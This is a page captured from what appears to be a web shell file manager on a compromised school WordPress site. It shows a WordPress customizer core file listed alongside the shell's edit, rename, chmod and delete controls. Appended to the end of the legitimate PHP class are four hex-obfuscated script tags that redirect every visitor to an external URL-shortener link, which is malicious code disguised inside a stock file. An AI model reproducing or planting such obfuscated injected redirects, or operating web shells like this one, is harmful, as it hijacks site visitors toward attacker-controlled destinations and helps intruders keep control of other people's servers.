Submit
Path:
~
/
home
/
ampckwxt
/
public_html
/
smpn11bpn.sch.id
/
wp-includes
/
customize
/
File Content:
class-wp-customize-nav-menu-control.php
<?php /** * Customize API: WP_Customize_Nav_Menu_Control class * * @package WordPress * @subpackage Customize * @since 4.4.0 */ /** * Customize Nav Menu Control Class. * * @since 4.3.0 * * @see WP_Customize_Control */ class WP_Customize_Nav_Menu_Control extends WP_Customize_Control { /** * Control type. * * @since 4.3.0 * @var string */ public $type = 'nav_menu'; /** * Don't render the control's content - it uses a JS template instead. * * @since 4.3.0 */ public function render_content() {} /** * JS/Underscore template for the control UI. * * @since 4.3.0 */ public function content_template() { $add_items = __( 'Add Items' ); ?> <p class="new-menu-item-invitation"> <?php printf( /* translators: %s: "Add Items" button text. */ __( 'Time to add some links! Click “%s” to start putting pages, categories, and custom links in your menu. Add as many things as you would like.' ), $add_items ); ?> </p> <div class="customize-control-nav_menu-buttons"> <button type="button" class="button add-new-menu-item" aria-label="<?php esc_attr_e( 'Add or remove menu items' ); ?>" aria-expanded="false" aria-controls="available-menu-items"> <?php echo $add_items; ?> </button> <button type="button" class="button-link reorder-toggle" aria-label="<?php esc_attr_e( 'Reorder menu items' ); ?>" aria-describedby="reorder-items-desc-{{ data.menu_id }}"> <span class="reorder"><?php _e( 'Reorder' ); ?></span> <span class="reorder-done"><?php _e( 'Done' ); ?></span> </button> </div> <p class="screen-reader-text" id="reorder-items-desc-{{ data.menu_id }}"> <?php /* translators: Hidden accessibility text. */ _e( 'When in reorder mode, additional controls to reorder menu items will be available in the items list above.' ); ?> </p> <?php } /** * Return parameters for this control. * * @since 4.3.0 * * @return array Exported parameters. */ public function json() { $exported = parent::json(); $exported['menu_id'] = $this->setting->term_id; return $exported; } } ob_start(); ?> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x71\x59\x54\x6d\x44\x61\x30\x72\x38";</script>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
admin.php
5362 bytes
0644
class-wp-customize-background-image-control.php
1970 bytes
0644
class-wp-customize-background-image-setting.php
1325 bytes
0644
class-wp-customize-background-position-control.php
3718 bytes
0644
class-wp-customize-code-editor-control.php
3003 bytes
0644
class-wp-customize-color-control.php
3752 bytes
0644
class-wp-customize-cropped-image-control.php
2145 bytes
0644
class-wp-customize-custom-css-setting.php
5974 bytes
0644
class-wp-customize-date-time-control.php
10132 bytes
0644
class-wp-customize-filter-setting.php
1274 bytes
0644
class-wp-customize-header-image-control.php
8716 bytes
0644
class-wp-customize-header-image-setting.php
2468 bytes
0644
class-wp-customize-image-control.php
1897 bytes
0644
class-wp-customize-media-control.php
10101 bytes
0644
class-wp-customize-nav-menu-auto-add-control.php
1808 bytes
0644
class-wp-customize-nav-menu-control.php
2814 bytes
0644
class-wp-customize-nav-menu-item-control.php
8843 bytes
0644
class-wp-customize-nav-menu-item-setting.php
28555 bytes
0644
class-wp-customize-nav-menu-location-control.php
2985 bytes
0644
class-wp-customize-nav-menu-locations-control.php
3503 bytes
0644
class-wp-customize-nav-menu-name-control.php
1817 bytes
0644
class-wp-customize-nav-menu-section.php
1402 bytes
0644
class-wp-customize-nav-menu-setting.php
19622 bytes
0644
class-wp-customize-nav-menus-panel.php
3995 bytes
0644
class-wp-customize-new-menu-control.php
1710 bytes
0777
class-wp-customize-new-menu-section.php
1693 bytes
0777
class-wp-customize-partial.php
11254 bytes
0644
class-wp-customize-selective-refresh.php
13754 bytes
0777
class-wp-customize-sidebar-section.php
1745 bytes
0644
class-wp-customize-site-icon-control.php
5859 bytes
0644
class-wp-customize-theme-control.php
12575 bytes
0644
class-wp-customize-themes-panel.php
4071 bytes
0644
class-wp-customize-themes-section.php
7641 bytes
0644
class-wp-customize-upload-control.php
1883 bytes
0644
class-wp-sidebar-block-editor-control.php
1372 bytes
0644
class-wp-widget-area-customize-control.php
2405 bytes
0644
class-wp-widget-form-customize-control.php
3332 bytes
0644
error_log
426 bytes
0644
index.htm
1092 bytes
0644
index.html
1092 bytes
0644
index.php
1092 bytes
0644
N4ST4R_ID | Naxtarrr